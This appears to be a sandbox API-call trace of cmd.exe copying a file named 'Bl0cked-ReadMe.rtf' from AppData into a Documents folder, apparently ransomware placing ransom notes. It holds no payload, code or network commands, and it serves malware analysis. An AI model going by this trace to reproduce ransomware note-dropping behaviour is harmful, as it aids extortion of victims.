2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f6d8, cchData=128 | out: lpLCData="0") returned 2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f6d8, cchData=128 | out: lpLCData="1") returned 2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0141.609] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0141.609] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.610] GetConsoleTitleW (in: lpConsoleTitle=0x3508f0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.611] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0141.611] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0141.611] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0141.611] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0141.612] _wcsicmp (_String1="type", _String2=")") returned 75 [0141.612] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0141.612] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0141.612] _wcsicmp (_String1="IF", _String2="type") returned -11 [0141.612] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0141.612] _wcsicmp (_String1="REM", _String2="type") returned -2 [0141.612] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0141.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.617] _get_osfhandle (_FileHandle=1) returned 0x7 [0141.617] GetFileType (hFile=0x7) returned 0x2 [0142.219] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0142.219] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26f5d0 | out: lpMode=0x26f5d0) returned 1 [0142.221] _dup (_FileHandle=1) returned 3 [0142.221] _close (_FileHandle=1) returned 0 [0142.221] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0142.221] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\2w7_ew\\5OWEKS~1\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\docume~1\\2w7_ew\\5oweks~1\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x26f5a0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0142.223] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0142.223] GetConsoleTitleW (in: lpConsoleTitle=0x26f3d0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0142.223] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0142.223] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0142.223] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0142.223] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0142.224] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0142.224] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x26ef34, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26ef34) returned 0x350e90 [0142.225] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0142.225] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0142.225] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0142.225] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x26de40, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0142.225] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0142.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.225] GetFileType (hFile=0x54) returned 0x1 [0142.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.225] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x26de98 | out: lpFileSizeHigh=0x26de98*=0x0) returned 0x1632 [0142.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.225] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.225] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.225] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.226] GetFileType (hFile=0x4c) returned 0x1 [0142.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.226] GetFileType (hFile=0x4c) returned 0x1 [0142.226] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.226] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] GetFileType (hFile=0x4c) returned 0x1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] GetFileType (hFile=0x4c) returned 0x1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] GetFileType (hFile=0x4c) returned 0x1 [0142.229] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.229] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] GetFileType (hFile=0x4c) returned 0x1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] GetFileType (hFile=0x4c) returned 0x1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] GetFileType (hFile=0x4c) returned 0x1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.230] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.230] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] GetFileType (hFile=0x4c) returned 0x1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.230] GetFileType (hFile=0x4c) returned 0x1 [0142.230] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.231] GetFileType (hFile=0x4c) returned 0x1 [0142.231] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.232] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.232] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] GetFileType (hFile=0x4c) returned 0x1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] GetFileType (hFile=0x4c) returned 0x1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] GetFileType (hFile=0x4c) returned 0x1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] GetFileType (hFile=0x4c) returned 0x1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] GetFileType (hFile=0x4c) returned 0x1 [0142.232] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.232] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.233] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.233] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] GetFileType (hFile=0x4c) returned 0x1 [0142.233] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.233] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] GetFileType (hFile=0x4c) returned 0x1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] GetFileType (hFile=0x4c) returned 0x1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] GetFileType (hFile=0x4c) returned 0x1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] GetFileType (hFile=0x4c) returned 0x1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] GetFileType (hFile=0x4c) returned 0x1 [0142.234] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.234] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.234] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.235] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.235] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] GetFileType (hFile=0x4c) returned 0x1 [0142.235] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.235] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] GetFileType (hFile=0x4c) returned 0x1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee60*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee60*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] GetFileType (hFile=0x4c) returned 0x1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] WriteFile (in: hFile=0x4c, lpBuffer=0x26eeb0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26eeb0*, lpNumberOfBytesWritten=0x26deb4*=0x20, lpOverlapped=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.236] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26dea0 | out: lpNewFilePointer=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=4) returned 0x54 [0142.236] ReadFile (in: hFile=0x54, lpBuffer=0x26ecd0, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26dec0, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesRead=0x26dec0*=0x200, lpOverlapped=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] GetFileType (hFile=0x4c) returned 0x1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] GetFileType (hFile=0x4c) returned 0x1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] WriteFile (in: hFile=0x4c, lpBuffer=0x26ecd0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ecd0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] GetFileType (hFile=0x4c) returned 0x1 [0142.236] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.236] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed20*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed20*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] GetFileType (hFile=0x4c) returned 0x1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed70*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ed70*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] GetFileType (hFile=0x4c) returned 0x1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] WriteFile (in: hFile=0x4c, lpBuffer=0x26edc0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26edc0*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] GetFileType (hFile=0x4c) returned 0x1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee10*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26deb4, lpOverlapped=0x0 | out: lpBuffer=0x26ee10*, lpNumberOfBytesWritten=0x26deb4*=0x50, lpOverlapped=0x0) returned 1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c [0142.237] GetFileType (hFile=0x4c) returned 0x1 [0142.237] _get_osfhandle (_FileHandle=1) returned 0x4c 